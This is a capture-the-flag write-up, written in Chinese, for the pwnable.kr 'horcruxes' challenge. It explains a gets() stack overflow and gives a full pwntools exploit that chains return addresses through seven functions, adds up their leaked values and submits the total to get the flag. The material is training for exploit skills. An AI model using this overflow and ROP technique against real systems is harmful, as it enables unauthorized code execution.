pwnable.kr 之 horcruxes

gets(s)栈溢出,且没有canary,没有PIE

本来想的是通过栈溢出直接跳到 if 内部输出 flag,不过该处地址 0x80A010B 中含有 0x0a 字节,而 gets 函数读到换行符('\x0a')就结束输入,因此无法把地址 0x80A010B 完整写到返回地址上。这个一步到位的方法 pass。

从 init_ABCDEFG 函数中得到 sum=a+b+c+d+e+f+g,且 A~G 各函数的地址形如 0x0809xxxx(不含 0x0a 字节),可以作为返回地址使用。

那么问题的解决方法就变成了:通过栈溢出依次跳转到函数 A~G,从输出中读出 a~g 的值求出 sum,再输入 sum 进入 if 分支读取 flag。

#coding:utf-8

# from libformatstr import FormatStr
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))
from pwn import *
import sys

# Toggle between a local process and the remote challenge instance.
local = 0
context.terminal = ['tmux', 'splitw', '-h']

# `python exploit.py DEBUG` (or `debug`) turns on pwntools' verbose I/O logging.
if len(sys.argv) == 2 and sys.argv[1] in ('DEBUG', 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./horcruxes')
    # Alternative launch forms kept for reference:
    #   p = process(argv=['', pay])
    #   p = process(["./ld.so", "./easygame"], env={"LD_PRELOAD": "./libc.so.6"})
else:
    p = remote("pwnable.kr", "9032")

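# gdb helper with optional correction for a randomised (PIE) text base.
# horcruxes itself is built without PIE (see the write-up above), so for this
# target the caller would pass PIE=False and an absolute address.
def debug(addr=0, PIE=True):
    """Attach gdb to the target and set a breakpoint at ``addr``.

    Args:
        addr: breakpoint address; an offset from the text base when ``PIE``
            is true, otherwise an absolute address.
        PIE: when true, the text base is taken from the second line that
            ``pmap <pid>`` prints (the first data line after the header)
            and added to ``addr``.
    """
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        # Print exactly the address the breakpoint is placed at, so the log
        # line and the gdb command agree.
        print("breakpoint_addr --> " + hex(text_base + addr))
        gdb.attach(p, 'b *{}'.format(hex(text_base + addr)))
    else:
        gdb.attach(p, "b *{}".format(hex(addr)))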

# Short I/O aliases over the tube ``p``.  They are thin wrappers rather than
# bound methods so that ``p`` is looked up at call time.
def sd(s):
    """Send raw data."""
    return p.send(s)


def rc(s):
    """Receive up to ``s`` bytes."""
    return p.recv(s)


def sl(s):
    """Send data followed by a newline."""
    return p.sendline(s)


def ru(s):
    """Receive until the delimiter ``s`` has been seen (inclusive)."""
    return p.recvuntil(s)


def sda(a, s):
    """Wait for ``a``, then send ``s``."""
    return p.sendafter(a, s)


def sla(a, s):
    """Wait for ``a``, then send ``s`` plus a newline."""
    return p.sendlineafter(a, s)

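def leak(name, addr):
    """Log a leaked address as ``<name> --> 0x...``.

    ``name`` is passed as a format argument instead of being spliced into
    the format string, so a '%' inside it can no longer break the log call.
    """
    log.info("%s --> %s", name, hex(addr))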

# Absolute entry points in the non-PIE binary.  A..G are the seven functions
# the ROP chain visits (each prints one "(EXP +<n>)" line); they sit 0x1F
# bytes apart.  None of these addresses contains a 0x0a byte, which matters
# because gets() stops reading at a newline.
A, B, C, D, E, F, G = (
    0x0809FE4B,
    0x0809FE6A,
    0x0809FE89,
    0x0809FEA8,
    0x0809FEC7,
    0x0809FEE6,
    0x0809FF05,
)
main = 0x0809FF24  # start of main()

sla("Menu:","12")
pay = 0x78*'a'
pay += p32(A) + p32(B) + p32(C) + p32(D) + p32(E) + p32(F) + p32(G) + p32(0x809FFFC)
#gdb.attach(p,"b *0x80A00EE")
sla("earned? : ",pay)
def get_rand():
    """Read the next EXP value the target prints, formatted as "(EXP +<n>)".

    Skips ahead to the "(EXP +" marker and parses the decimal number that
    precedes the closing parenthesis.
    """
    ru("(EXP +")
    number_and_paren = ru(")")
    return int(number_and_paren[:-1])
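# Each of A..G prints one "(EXP +<n>)" line as the chain runs; collect all
# seven and add them up.  The total is kept in ``total`` rather than ``sum``
# so the builtin used to compute it is not shadowed.
exp_values = [get_rand() for _ in range(7)]
total = sum(exp_values)
# NOTE(review): the binary presumably does this addition in C ``int``
# arithmetic, so if the seven values can exceed 2**31-1 in total the value it
# compares against would wrap, while this script sends the unwrapped Python
# integer.  Confirm against the binary whether a signed 32-bit wrap is needed.

# Back in the menu: choose option 12 again and answer with the total.
sla("Menu:", '12')
# gdb.attach(p, "b *0x80A00EE")
sla("earned? : ", str(total))
p.interactive()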